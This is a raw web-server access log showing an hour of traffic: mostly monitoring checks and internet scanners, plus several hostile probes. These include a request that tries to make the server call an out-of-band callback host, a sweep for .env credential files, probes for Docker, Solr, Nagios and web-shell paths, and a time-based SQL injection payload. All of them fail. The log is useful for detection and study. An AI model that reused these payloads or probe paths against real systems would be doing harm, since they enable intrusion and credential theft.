77.90.153.48 - - [03/Jul/2025:15:20:28 +0200] "GET /api/cors/http:%2f%2fnextchat.d1f553p9gkq560tu7mcgsenk8o5iuocfh.oast.site%23 HTTP/1.1" 404 374 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
212.91.247.32 - - [03/Jul/2025:15:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [03/Jul/2025:15:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:15:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:15:25:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:15:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.208.158.206 - - [03/Jul/2025:15:27:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (mitsec)"
212.91.247.32 - - [03/Jul/2025:15:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [03/Jul/2025:15:28:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:15:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.22.16.88 - - [03/Jul/2025:15:29:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [03/Jul/2025:15:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [03/Jul/2025:15:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:15:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.234.59.189 - - [03/Jul/2025:15:30:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
212.91.247.32 - - [03/Jul/2025:15:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.133 - - [03/Jul/2025:15:32:56 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
87.121.84.130 - - [03/Jul/2025:15:33:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
80.82.70.133 - - [03/Jul/2025:15:33:08 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:15:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /bedesk1.1/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /test/bedesk1.1/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:12 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /API/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /.env.backup HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /env/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
2.58.56.120 - - [03/Jul/2025:15:41:13 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.247.32 - - [03/Jul/2025:15:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
13.220.107.250 - - [03/Jul/2025:15:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:15:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.149.216 - - [03/Jul/2025:15:50:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:15:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [03/Jul/2025:15:50:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:15:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.41.52.0 - - [03/Jul/2025:15:53:23 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
204.76.203.219 - - [03/Jul/2025:15:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:15:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.61 - - [03/Jul/2025:15:55:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [03/Jul/2025:15:55:43 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [03/Jul/2025:15:55:43 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.61 - - [03/Jul/2025:15:55:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.61 - - [03/Jul/2025:15:55:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.61 - - [03/Jul/2025:15:55:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.146.61 - - [03/Jul/2025:15:55:50 +0200] "GET /security.txt HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [03/Jul/2025:15:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:15:57:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.219 - - [03/Jul/2025:15:57:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:15:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [03/Jul/2025:15:59:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:15:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.38.39.17 - - [03/Jul/2025:16:00:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.38.39.17 - - [03/Jul/2025:16:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0"
34.38.39.17 - - [03/Jul/2025:16:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041"
34.38.39.17 - - [03/Jul/2025:16:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
34.38.39.17 - - [03/Jul/2025:16:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
34.38.39.17 - - [03/Jul/2025:16:00:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
34.38.39.17 - - [03/Jul/2025:16:00:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
212.91.247.32 - - [03/Jul/2025:16:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.132.244 - - [03/Jul/2025:16:01:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.132.244 - - [03/Jul/2025:16:01:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.132.244 - - [03/Jul/2025:16:01:48 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
165.22.132.244 - - [03/Jul/2025:16:01:49 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
165.22.132.244 - - [03/Jul/2025:16:01:49 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:16:01:49 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:16:01:49 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:16:01:50 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:16:01:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.132.244 - - [03/Jul/2025:16:01:50 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
165.22.132.244 - - [03/Jul/2025:16:01:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:16:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:16:05:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:16:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET /odinhttpcall1751551110 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.70.28 - - [03/Jul/2025:16:06:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.172.185.51 - - [03/Jul/2025:16:06:13 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
159.89.16.251 - - [03/Jul/2025:16:06:13 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.229.159 - - [03/Jul/2025:16:06:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
206.81.29.108 - - [03/Jul/2025:16:06:13 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
165.227.163.149 - - [03/Jul/2025:16:06:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.172.185.51 - - [03/Jul/2025:16:06:13 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
159.65.125.111 - - [03/Jul/2025:16:06:13 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
167.172.185.51 - - [03/Jul/2025:16:06:13 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
165.227.163.149 - - [03/Jul/2025:16:06:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.223.83.238 - - [03/Jul/2025:16:06:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
80.82.77.202 - - [03/Jul/2025:16:06:42 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.133 - - [03/Jul/2025:16:07:07 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
34.41.52.0 - - [03/Jul/2025:16:07:14 +0200] "GET /containers/json HTTP/1.1" 404 320 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [03/Jul/2025:16:07:26 +0200] "GET /nagiosxi/login.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30"
77.90.153.48 - - [03/Jul/2025:16:07:28 +0200] "POST /nagiosxi/login.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:16:07:30 +0200] "GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
212.91.247.32 - - [03/Jul/2025:16:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [03/Jul/2025:16:08:34 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [03/Jul/2025:16:09:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:16:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:16:10:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:16:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:16:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.211.51.118 - - [03/Jul/2025:16:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
212.91.247.32 - - [03/Jul/2025:16:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.44.137.54 - - [03/Jul/2025:16:13:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
